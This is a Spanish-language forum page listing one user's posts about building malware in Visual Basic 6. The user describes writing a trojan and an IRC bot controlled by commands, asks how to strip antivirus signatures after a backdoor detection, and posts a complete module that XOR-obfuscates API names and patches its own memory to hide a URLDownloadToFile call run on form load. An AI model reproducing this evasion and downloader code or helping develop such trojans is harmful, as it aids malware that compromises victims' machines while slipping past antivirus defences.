Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Dark4ngel

Páginas 1 2 3
#21
Programación Visual Basic / Re: mAPIObfuscation
29 Octubre 2011, 11:31 AM
modulo:

Código [Seleccionar]

'---------------------------------------------------------------------------------------
' Module    : mAPIObfuscation
' Author    : Karcrack
' Now$      : 29/08/2009  13:54
' Used for? : Obfuscate API Declaration
'---------------------------------------------------------------------------------------

'MSVBVM60
public Declare Sub CopyBytes Lib "MSVBVM60" Alias "__vbaCopyBytes" (ByVal Size As Long, Dest As Any, Source As Any)

'KERNEL32
public Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByRef lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByRef lpNumberOfBytesWritten As Long) As Long

public Declare Function IsBadReadPtr Lib "KERNEL32" (ByRef lp As Any, ByVal ucb As Long) As Long

'api download
Public Declare Function URLDownloadToFile Lib "Š"''" Alias "ª­³»ˆ'"ž›«¹–"š¾" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long


Public Function DeObfuscateAPI(ByVal sLib As String, ByVal sFunc As String) As Boolean
   Dim lAddr           As Long
   Dim sBuff           As String * &H200
   Dim lLib            As Long
   Dim lFunc           As Long

   If App.LogMode = 0 Then GoTo OUT

   lAddr = App.hInstance& - Len(sBuff)

   Do
       lAddr = lAddr + Len(sBuff)
       If IsBadReadPtr(ByVal lAddr, Len(sBuff)) <> 0 Then GoTo OUT
       Call CopyBytes(Len(sBuff), ByVal sBuff$, ByVal lAddr&)
       lLib = InStr(1, sBuff, sLib, vbBinaryCompare)
       lFunc = InStr(1, sBuff, sFunc, vbBinaryCompare)
   Loop Until (lLib <> 0) And (lFunc <> 0)

   lLib = lAddr + lLib - 1
   lFunc = lAddr + lFunc - 1

   If WriteProcessMemory(-1, ByVal lLib&, ByVal E(sLib), Len(sLib), ByVal 0&) = 0 Then GoTo OUT
   If WriteProcessMemory(-1, ByVal lFunc&, ByVal E(sFunc), Len(sFunc), ByVal 0&) = 0 Then GoTo OUT

   DeObfuscateAPI = True: Exit Function
OUT:
   DeObfuscateAPI = False: Exit Function
End Function

Public Function E(ByVal s As String) As String
   Dim i               As Long

   For i = 1 To Len(s)
       E = E & Chr$(Asc(Mid$(s, i, 1)) Xor &HFF)
   Next i
End Function




en el form load:
Código [Seleccionar]
private sub form_load()
  If DeObfuscateAPI("Š"''", "ª­³»ˆ'"ž›«¹–"š¾") = True Then
       Descarga = URLDownloadToFile(0, URL, LocalFilename, 0, 0)
   End If
end sub
#22
Programación Visual Basic / mAPIObfuscation
29 Octubre 2011, 02:27 AM
hola toy utilizando la mAPIObfuscation de Karcrack, en urldownloadtofile, y supongamos que hago una descarga con un 1 command , y me lo descarga bien, pero si hago una 2 descarga con un 2 command u otro no descarga el archivo.

Un saludo
#23
Análisis y Diseño de Malware / av
27 Octubre 2011, 09:41 AM
y como encuentro la parte virica?? quitando codigo, y mandandolo a escanear.. y asi sucesivamente asta que encuentre las lineas que detecta?
#24
Análisis y Diseño de Malware / Re: av
25 Octubre 2011, 21:31 PM
he escaneado en novirusthanks (perdon por si es spam) es un proyecto que estoy haciendo en vb6 y nose xk me detecta con esa firma (que lo que tenia k cifrar ya lo encripte y asi consegui sakar avira) no se que sera... como no sea el csocketmaster... un saludo
#25
Análisis y Diseño de Malware / av
24 Octubre 2011, 23:11 PM
hola muy buenas a todos,escaneando el proyecto compilado que hice me encontrado con esto:

Código [Seleccionar]
Avast 24/10/2011 5.0
AVG 24/10/2011 10.0.0.1190
Avira AntiVir 24/10/2011 7.11.7.12
ClamAV 24/10/2011 0.97
Comodo 24/10/2011 4.0
Emsisoft 24/10/2011 5.1.0.3 Backdoor.Win32.RShot!IK
F-Prot 24/10/2011 6.3.3.4884
Ikarus 24/10/2011 T31001097 Backdoor.Win32.RShot
TrendMicro 24/10/2011 9.200.0.1012

supongo que sacando una firma, sale la otra.. no?

porque pueden saltar esos av??

espero respuestas y gracias!!
#26
Programación Visual Basic / Enviar un archivo por dcc
17 Febrero 2006, 00:40 AM
Hola buenas a todos, queria saber si hay alguna forma en vb de que el programa envie un archivo por dcc, osea me explico, estoy haciendo un programa, que conecta a un servidor irc y entra un bot, al que yo le mando comandos, pos keria saber como hacer para que yo al poner un comando especifico, el bot me envie por dcc el archivo. un saludo, Dark4ngel ;)
#27
Programación Visual Basic / Problema con Api de winsock (Modulo CSocketMaster)
26 Octubre 2005, 04:10 AM
Buenas, toy haciendo un troyano con la api de winsock y va todo bien.. pero hay un error, que cuando el server se abre y abre el puerto, si cierro el server y lo vuelvo a ejecutar dice que esta en uso el addres, y eh problado con Winsock1.CloseSck para cerrar la conexion.. pero nada... sigue en uso.. el puerto.. solo funciona cuando cierro el proyecto del server del troyano y lo vuelvo a abrir, espero que me ayuden, Gracias
Páginas 1 2 3